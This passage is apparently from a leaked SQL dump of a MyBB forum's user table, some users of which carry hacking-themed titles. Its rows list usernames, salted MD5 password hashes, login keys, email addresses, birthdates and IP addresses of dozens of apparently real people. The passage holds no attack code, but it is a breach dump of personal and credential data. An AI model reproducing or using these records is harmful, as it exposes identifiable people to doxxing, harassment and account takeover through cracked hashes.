'HTMqsDAE43wJQCipOfdlrGedO9XEq5Qpu2pKLBClTRKCg37C3k', 'jagheterarn2@live.se', '52', './uploads/avatars/avatar_199.gif?dateline=1348716313', '108|135', 'upload', '2', '17', '17', '', '1348716179', '1352594343', '1352501459', '1351955868', '', '0', '', '', '', '10-11-1994', 'all', '[img]http://i.imgur.com/OZWG9.gif[/img]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '10', '85.230.50.38', '85.230.49.83', '1441149478', '1441149267', '', '28589', '1', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '5'); INSERT INTO mybb_users VALUES('200', 'Poptart', '55dcd7c6fdac90d03e2e020892d438fc', 'goXreXgt', 'eCgdkHGL82GVo7YDjurKmrId8hNou9cFiQlntW1wzFuemecwtx', 'buggyjackl@gmail.com', '14', '', '', '', '2', '', '0', '', '1348793896', '1348797846', '1348797846', '1348797830', '', '0', '', '', '', '15-11-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '1', '24.212.197.164', '24.212.197.164', '416597412', '416597412', '', '1401', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('201', 'Huey', '6037587c4c323d6124092ebd7a016568', 'TNdGOTeg', 'pNgDExRaHYUek98PhqzT3aoVjFGl9zGcQS8WIOP69meFvmNRRB', 'jm0720@live.com', '0', '', '', '', '2', '', '0', '', '1348804805', '1348880165', '1348805352', '0', '', '0', '', '', '', '1-1-1998', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '46.246.31.102', '46.246.31.97', '787881830', '787881825', '', '844', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('202', 'kur0', '90436a0108b5eb7a9c840e8bdcb26129', '3zOFnuww', '53L6VrFZlr1Dyh2bAH7ZDvm8nAuhxxh42Ag292NmbN2E4l9wm5', 'kur_kur02Z@yahoo.com', '0', '', '', '', '2', '', '0', '', '1348810401', '1348812320', '1348810492', '0', '', '0', '', '', '', '31-12-1986', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '180.247.247.206', '180.247.247.206', '-1258817586', '-1258817586', '', '781', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('203', 'NeonLights', 'f5baf1e075d5d66e364c292947e52ee6', 'R4Cjo8LY', 'kvnT9CksTuXkqzcXS1DUOf16PVBH1lB7yjuoZuIEXJthhy5AvF', 'bigfatchode@hotmail.ca', '88', './uploads/avatars/avatar_203.jpg?dateline=1348861691', '96|120', 'upload', '7', '', '0', 'BlackHat Expert', '1348859621', '1351919521', '1350088783', '1349919588', '', '0', '', '', '', '2-4-1997', 'all', '[align=center][img]http://i.imgur.com/2Ytdn.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '1', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', 'I LIKE WEED!', '0', '2', '14', '67.68.75.99', '173.245.64.81', '1128549219', '-1376436143', '', '106330', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '27'); INSERT INTO mybb_users VALUES('204', 'ml2324', '6e5f79804f453a0dcd1d291c0d64d097', 'uXydqnd9', '6GMfnYIcsl3FdW34tOnop83dUcaQ5HD2BVZselJP55CxelYo9V', 'martinkinglomosad@gmail.com', '0', '', '', '', '2', '', '0', '', '1348891320', '1348892480', '1348891320', '0', '', '0', '', '', '', '20-3-1990', 'all', '', '1', '0', '0', '0', '0', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '122.52.119.1', '122.52.119.1', '2050258689', '2050258689', '', '1160', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('205', 'mothered', 'f38cdf13ce643bf923748c682f877f1d', '6vpLS6YP', 'WRBIezYFvBlCppmUf8m7WgLERsDMcLWkQzD7WYTfL7uOpxBKAe', 'mothered@live.com.au', '196', './uploads/avatars/avatar_205.png?dateline=1348894234', '80|80', 'upload', '9', '', '0', 'Nevermind how, I will login', '1348894111', '1352717095', '1352688320', '1352635342', '', '0', '', '', '', '30-7-1968', 'all', '[url=http://www.windows8hacker.com/]\r\n\r\n[img]http://img706.imageshack.us/img706/6481/windows8hacker.png[/img][/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '10', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '16', '210.50.40.19', '108.162.248.5', '-768464877', '1822619653', '', '60932', '1', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:4:{s:4:\"acid\";a:15:{i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:19;a:5:{s:4:\"acid\";i:19;s:4:\"name\";s:6:\"Genius\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_25_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:5;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:6;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:7;a:1:{s:11:\"showpostbit\";i:0;}i:9;a:1:{s:11:\"showpostbit\";i:0;}i:10;a:1:{s:11:\"showpostbit\";i:0;}i:11;a:1:{s:11:\"showpostbit\";i:0;}i:12;a:1:{s:11:\"showpostbit\";i:0;}i:13;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '22'); INSERT INTO mybb_users VALUES('206', 'aayush', 'e0b9e0cdb8a157b7c7405649a402890b', 'OY6xLC3Q', 'Yw9tMotQuydzbA995fxJs4pvDiq7eJwCfYgtjwAqaAWdRd3r9T', 'aayushkheterpal@gmail.com', '0', '', '', '', '2', '', '0', '', '1348952755', '1349793611', '1349034681', '0', '', '0', '', '', '', '17-3-1996', 'all', '', '1', '1', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '5.5', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '122.176.137.20', '122.176.146.207', '2058389780', '2058392271', '', '692', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('207', 'Combat', '5a18146f94dbffc864fc4d0dc4ea385f', 'XhFRqfUL', '4qeinT59PhaXo9zhwh9DzDvaRH8fnuWhmURAoKw5y4RfPwHytP', 'tfdavison@hotmail.com', '1', '', '', '', '2', '', '0', '', '1348966717', '1350164261', '1350078051', '1349069555', '', '0', '', '', '', '12-12-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '76.121.85.91', '76.28.177.62', '1283020123', '1276948798', '', '1691', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('208', 'alinaansari', 'cc9fb4d902bf4d9f1e1ea0506ae9d01c', '8nKShYmC', 'FtHADarUrllTWF18RFBDYpZ239d5qqcq7pNzx6sZz7R87LRTXW', 'cutealinaansari@gmail.com', '0', '', '', '', '2', '', '0', '', '1349012362', '1349012951', '1349012362', '0', '', '0', '', '', '', '2-2-1992', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '203', '0', '0', '182.178.29.232', '182.178.29.232', '-1229840920', '-1229840920', '', '589', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('209', 'Kaveman', 'ccdf516de84f9d8782a596f5a21bf060', 'i1ZpGVtg', 'iEkpzUjAGt5C86stK5HQN6Tzd7LwB7rerHUNeS55aqpNSJRWws', 'geo.kaveman@gmail.com', '0', '', '', '', '2', '', '0', '', '1349019583', '1349019810', '1349019583', '0', '', '0', '', '', '', '13-10-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.43.75.187', '94.43.75.187', '1579895739', '1579895739', '', '227', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('210', 'Skymd', 'f9e92614537d40d16c5151d608baee66', 'sEdlAwtU', 'p36rkGHgnMT16HqWT2Cs1FQnwk7soMWeya3i57zHDOHDtgj3HP', 'skymd@live.com', '0', '', '', '', '2', '', '0', '', '1349049238', '1350035464', '1349049381', '0', '', '0', '', '', '', '2-4-1998', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '71.184.126.65', '173.76.159.245', '1203273281', '-1387487243', '', '143', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('211', 'NotJester', 'bcdc41eca28762c62e017933d40a7b30', 'xvFXP8Dm', 'q2XUQLrWZvoGooFelHqu7sGp2OfBfdtgkxaU1QKcoGCcZtugVN', '23lraqa0.2cn@20minutemail.com', '0', '', '', '', '7', '', '0', '', '1349056669', '1349056766', '1349056669', '0', '', '0', '', '', '', '1-4-1983', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '174.127.99.162', '174.127.99.162', '-1367383134', '-1367383134', '', '97', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('212', 'hades10', 'ab482d5c00d61ea777dfcdeb94969c37', 'uezHOgzF', 'A6CBAUNkIapfEw8Ba94mcoj5t63edUM3rdpKiPrgwRFH2vl6AS', 'bvasilis1@hotmail.com', '0', '', '', '', '2', '', '0', '', '1349091170', '1349092204', '1349091170', '1349092204', '', '0', '', '', '', '3-5-1980', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '176.92.96.130', '176.92.96.130', '-1336123262', '-1336123262', '', '1034', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('213', 'BitMonst3r', '1a3d21cb52adb7219eda928d6fba127f', 'o66vMU8z', 'RxAyJQa6S9IVALnXLvASO5eSx5gn3g8bClRqKay5TnavGJ5GKM', 'hfleaks@gmail.com', '9', './uploads/avatars/avatar_213.jpg?dateline=1349617843', '120|140', 'upload', '2', '', '0', '', '1349107448', '1350400184', '1349867900', '1349758717', '', '0', '', '', '', '28-1-1989', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '188.69.227.48', '178.250.34.208', '-1136270544', '-1292229936', '', '3949', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '5'); INSERT INTO mybb_users VALUES('215', 'ThinkChange', '00afd1cad9951bce14c36d0270fa92e9', 'A3YLVrxt', '2eUfiQZFnbdazZ1Ga7dPKCFWLoDmvWetPG1lIyKmWamMy1o5nG', 'evil-elmo1996@hotmail.com', '0', '', '', '', '2', '', '0', '', '1349340669', '1349341043', '1349340669', '0', '', '0', '', '', '', '17-1-1996', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '121.7.73.219', '121.7.73.219', '2030520795', '2030520795', '', '374', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('216', 'o_o', '951ab578736cba34dc0cc03da3226bf0', 'tfyaPc1M', 'fDRnI2sjXujeWA9f7Tee2eWDGpaFrxDgXcpr6vR4zhOIPIwRCu', 'vmhmido@hotmail.com', '1', '', '', '', '2', '', '0', '', '1349363263', '1349365459', '1349363263', '1349363635', '', '0', '', '', '', '7-6-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '197.226.120.114', '197.226.120.114', '-975013774', '-975013774', '', '2200', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('217', 'IamV', 'acb084ba78d5214a1276cc78c39a3cda', 'th3nZEvo', 'TeNZzvkvlEEqVtT5eopERLwi7XQryVBoJvnTKxyR5N3OgMqFnt', 'odroo92@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349386240', '1349386955', '1349386240', '0', '', '0', '', '', '', '4-7-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '203', '0', '0', '75.114.206.243', '75.114.206.243', '1265815283', '1265815283', '', '715', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('218', 'Armen', '87ff57ff14961f74fae04fd7749c20ed', 'B5HLJ3LI', '1iCYM255lMYjDctpF6Q2k7Y2NFcCv2bHgcHsnhtBSweIvAIXxZ', 'dalegacy16@aim.com', '0', '', '', '', '2', '', '0', '', '1349398815', '1349398828', '1349398815', '0', '', '0', '', '', '', '16-11-1993', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '67.86.115.130', '67.86.115.130', '1129739138', '1129739138', '', '13', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('223', 'StarZ', '13337b0385ccf82433fd5d7515f519ba', 'W4H3Hvsx', 'NTYqsFEqjb4LoPs3KGzDx18TY8qC2pRfM1tHf89X1ESFP38aG4', 'Aur0ras@hotmail.com', '6', '', '', '', '2', '', '0', '', '1349474580', '1350163790', '1349495972', '1349495972', '', '0', '', '', '', '1-1-1970', 'none', '', '1', '1', '0', '1', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '174.127.99.156', '174.127.99.156', '-1367383140', '-1367383140', '', '1701', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '4'); INSERT INTO mybb_users VALUES('219', 'kaitlin', '5f178c1b060b8245a2244592b609b41a', 'J48MgEiI', 'gcuPDnviDI8eBlJbIWrmyOmp4MJDTlHKaCMZHYWhgB6Jn6MPvQ', 'leahrolls@hotmail.com', '2', '', '', '', '2', '', '0', '', '1349427949', '1349465993', '1349428043', '1349465888', '', '0', '', '', '', '7-11-1997', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.0.65.178', '94.0.65.178', '1577075122', '1577075122', '', '1110', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('220', 'Shinichi', 'eb903b5d9b577e66a32cce2862e5c2bc', '6sgoqQEi', 'wXDibA7RvyMo87zhdcYOTq7PEK472RSwwtB8EaOm8rsK81i847', 'kuduo.shinichi19@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349440227', '1349440518', '1349440227', '0', '', '0', '', '', '', '24-3-1997', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '8', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '112.204.57.97', '112.204.57.97', '1892432225', '1892432225', '', '291', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('222', 'Exposé', 'd59c5647ac77e4aba47f5b049d1f77d8', 'ZJBpyyWc', 'XPqe2pN8UGjtArp9m7npXTQQp1GWHOHmuNeioVEfHmkQCdvrG7', 'itsjinxer@gmail.com', '275', 'http://www.avatarsdb.com/avatars/cool_chick.gif?dateline=1349538927', '100|100', 'remote', '9', '17,13,21', '9', 'Don\'t feed the trolls! I love NXK', '1349462201', '1352543852', '1352532374', '1352318123', '', '0', '', '', '', '19-2-1991', 'all', '[align=center]Want to expose those who deserve to be exposed like scammers and cyber bullies. Check out http://notsoanonymo.us today![/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '18', '74.76.76.132', '74.67.7.114', '1246514308', '1245906802', '', '231728', '1', '66', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:4:{s:4:\"acid\";a:16:{i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:5:{s:4:\"acid\";i:1;s:4:\"name\";s:9:\"SE Legend\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_20_10_12_11_54_35.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:22;a:5:{s:4:\"acid\";i:22;s:4:\"name\";s:7:\"Painter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:7;a:1:{s:11:\"showpostbit\";i:0;}i:8;a:1:{s:11:\"showpostbit\";i:0;}i:9;a:1:{s:11:\"showpostbit\";i:0;}i:10;a:1:{s:11:\"showpostbit\";i:0;}i:11;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:1:{s:11:\"showpostbit\";i:1;}}}', '29'); INSERT INTO mybb_users VALUES('275', 'Light dub', 'bd7b7d957eda5259308346f0f1a5ef78', 'KxwBWMcX', 'TMdzTRekLme8LJjAG9krFwqcI1GX4Om3r39xmpciaOSmhh3ic2', 'Frank_m_stewart@hotmail.com', '0', '', '', '', '2', '', '0', '', '1350548413', '1350550976', '1350548413', '0', '', '0', '', '', '', '10-10-1986', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '92.40.175.24', '92.40.175.24', '1546170136', '1546170136', '', '2563', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('237', 'Azwan81', '47a622a2c81501b4838265710cd2963b', 'Y5bF6vDh', 'E1BB786WelKMbxeQjRwRNRxWBmRCxjcph76KBafw1fQ78JoLlR', 'dsparda8225@gmail.com', '1', '', '', '', '2', '', '0', '', '1349699482', '1351348944', '1350124814', '1349706134', '', '0', '', '', '', '3-3-1980', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '203.92.138.166', '203.92.138.166', '-883127642', '-883127642', '', '8094', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('238', 'w00t', '1027b1068bf5b80dff8cb42b4a61ec85', 'mr2NN8AW', 'LYrySIoFCIrrXMx2toDgpOE7s7lu13Aaj71pozqF8Hi1PNGFqr', 'jamsport@sbcglobal.net', '0', '', '', '', '2', '', '0', '', '1349707619', '1349707765', '1349707619', '0', '', '0', '', '', '', '5-10-1990', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '108.221.21.146', '108.221.21.146', '1826428306', '1826428306', '', '146', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('240', 'Hardz', '5adb22c025fe5c3e650516c847c73a6d', 'bsrMnVDs', 'KpciGb49WArbxCZVsvpNvixSLrxVooYladtAEJjUFk2eIxlYYI', 'knowlezyy@gmail.com', '2', './uploads/avatars/avatar_240.png?dateline=1349728773', '100|100', 'upload', '2', '', '0', '', '1349725557', '1350179489', '1350164611', '1349729823', '', '0', '', '', '', '20-7-1984', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '86.135.61.58', '86.173.50.88', '1451703610', '1454191192', '', '7906', '1', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('241', 'Constrain', '14ed26f3a2c6bba196f125e54a8e2c23', 'zBS1bRec', '2ppEba2uynOeCX58LrPvD7jIKTaeG41NxUkJ1zWozGfPzExOXt', 'schultz_logan@ymail.com', '1', '', '', '', '2', '', '0', '', '1349731310', '1350934535', '1350437938', '1349731685', '', '0', '', '', '', '3-9-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '108.18.121.45', '108.18.121.45', '1813149997', '1813149997', '', '1710', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('249', 'Ultimatum', '2683b26f36dab3cd8f483cfa60c21c5b', '3f47LTCV', '4jUw9mpzzFgzUcD6YRgXdXhDEqM9Yp8fceb4KfSHNCqvRCFw3A', 'lin29061@gmail.com', '3', './uploads/avatars/avatar_249.jpg?dateline=1349764724', '120|120', 'upload', '7', '', '0', '', '1349764217', '1350164687', '1350164687', '1350091295', '', '0', '', '', '', '1-1-1990', 'all', '[align=center][img]http://i.imgur.com/TKoUM.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '10', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '121.215.220.45', '124.187.6.178', '2044189741', '2092631730', '', '3117', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('243', 'Anarchy $ucks', 'bec807af55317fc6c9df7f9ac8f3520a', 'gtl4HLiN', 'MS4HJu7hsUCCvcM8Yb6MGolFnZitD7ABwcSlVtugTSoACX8cDi', '12234@gmail.com', '29', '', '', '', '7', '', 